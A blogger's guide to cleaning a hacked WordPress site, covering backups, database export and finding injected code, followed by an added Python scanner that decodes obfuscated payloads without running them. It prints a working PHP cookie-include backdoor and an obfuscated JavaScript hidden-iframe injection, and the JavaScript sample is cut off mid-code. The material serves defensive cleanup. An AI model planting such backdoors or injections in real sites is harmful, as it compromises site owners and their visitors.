What to do when your blog has a virus

The last time my blog was hacked was… let me remember… uh… yesterday.

But hackers have known about my blog for quite a long time, and they even got it marked by Google as a site that may harm your computer.

Never mind, all these attacks gave me some experience with the typical WordPress hack.

So, when you realize your blog has been hacked, follow these steps:

Back up your FTP content

Simply open your favorite FTP client and download all the content of your site.

Back up your MySQL database

Every decent hosting plan now supports phpMyAdmin. With this tool you can export and save your entire database in a matter of seconds (or minutes, depending on the size of your DB).

With your WP database selected, click on Export.

On the next page, remember to:

1) Have all tables selected

2) Select SQL as database type

3) Check Structure, Add IF NOT EXISTS and Enclose table and field names with backquotes. Leave Add AUTO_INCREMENT value unchecked, because WP tables already have an auto-increment column

4) Check Data, Complete inserts, Extended inserts and Use hexadecimal for BLOB

5) Check Save as file and None. Choosing zipped can be too CPU-intensive for your hosting plan

Hunt for the virus

I experienced two types of viruses, both with code inserted into my WP files.

The first one is PHP code inserted in one page, like this one:

eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));

which, once base64-decoded, is a backdoor that includes whatever file the "sh" cookie names:

if(isset($_COOKIE["sh"])){include($_COOKIE["sh"]);exit;}

The second one is JavaScript code inserted in one page, like this one:

var OymMAWPnBMGWAGuoPiVY = "q60q105q102q114q97q109q101q32q119q105q100q116q104q61q34q52q56q48q34q32q104q101q105q103q104q116q61q34q54q48q34q32q115q114q99q61q34q104q116q116q112q58q47q47q105q108q111q118q101q104q97q115q104q46q99q110q47q114q97q115q116q97q116q100q115q47q103q111q46q112q104q112q63q115q105q100q61q53q34q32q115q116q121q108q101q61q34q98q111q114q100q101q114q58q48q112q120q59q32q112q111q115q105q116q105q111q110q58q114q101q108q97q116q105q118q101q59q32q116q111q112q58q48q112q120q59q32q108q101q102q116q58q45q53q48q48q112q120q59q32q111q112q97q99q105q116q121q58q48q59q32q102q105q108q116q101q114q58q112q114q111q103q105q100q58q68q88q73q109q97q103q101q84q114q97q110q115q102q111q114q109q46q77q105q99q114q111q115q111q102q116q46q65q108q112q104q97q40q111q112q97q99q105q116q121q61q48q41q59q32q45q109q111q122q45q111q112q97q99q105q116q121q58q48q34q62q60q47q105q102q114q97q109q101q62";var LtBVGDCUsUSHTFUTcjHd = OymMAWPnBMGWAGuoPiVY.split("q");var wOAwUuljcGInzJIGNLaG = "";for (var gtNzyhTaRbENpEKKzvub=1; gtNzyhTaRbENpEKKzvub

that once evaluated returns

I got some more similar code injected into my pages, but all of it was inserted at the end of the page, in the last row.

So you should search for eval or document.write and see if there are strange strings like the ones I got.

Then delete them or comment them out, and your blog should be clean and virus-free.
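
The search described above can be scripted. The following Python script is an added example, not code from the original post: it walks a downloaded copy of the site, flags the two obfuscation patterns shown on this page, and decodes them without executing anything. The function names, the file-extension list and the sample JavaScript payload are assumptions made for the illustration.

```python
import base64
import re
import tempfile
from pathlib import Path

# Shapes of the two samples on this page: eval(base64_decode('...')) and "q60q105..."
PHP_EVAL = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]")
JS_CODES = re.compile(r"[\"'](([A-Za-z])\d{2,3}(?:\2\d{2,3}){7,})[\"']")
EXTENSIONS = {".php", ".js", ".html", ".htm"}


def decode_line(line):
    """Statically decode (never execute) obfuscated payloads found on one line."""
    found = []
    for m in PHP_EVAL.finditer(line):
        try:
            text = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        except ValueError:  # malformed base64, e.g. bad padding
            text = "<undecodable>"
        found.append(("php-eval-base64", text))
    for m in JS_CODES.finditer(line):
        codes = [c for c in m.group(1).split(m.group(2)) if c]
        found.append(("js-charcodes", "".join(chr(int(c)) for c in codes)))
    return found


def scan_tree(root):
    """Return (relative path, line no, is last line, kind, decoded) for each hit."""
    hits = []
    files = [p for p in Path(root).rglob("*") if p.suffix.lower() in EXTENSIONS]
    for path in sorted(f for f in files if f.is_file()):
        rel = path.relative_to(root).as_posix()
        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
        for n, line in enumerate(lines, start=1):
            hits += [(rel, n, n == len(lines), kind, text) for kind, text in decode_line(line)]
    return hits


def demo():
    # PHP line copied from this page; the JS payload is a constructed, harmless string
    php = "eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbInNoIl0pKXtpbmNsdWRlKCRfQ09PS0lFWyJzaCJdKTtleGl0O30='));"
    js = "".join("q%d" % ord(ch) for ch in "<b>constructed</b>")
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text("<?php\necho 'hi';\n" + php + "\n")
        Path(root, "theme.js").write_text('var ok = 1;\nvar s = "' + js + '";\n')
        return scan_tree(root)


if __name__ == "__main__":
    print(*demo(), sep="\n")
```

Point scan_tree at the FTP backup made in the first step rather than at the live site, and review every hit by hand before deleting anything.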

I am thinking about making a plugin that does all this hard work for you; at the moment the only existing one seems to be WordPress Exploit Scanner, but I would like something more complete.
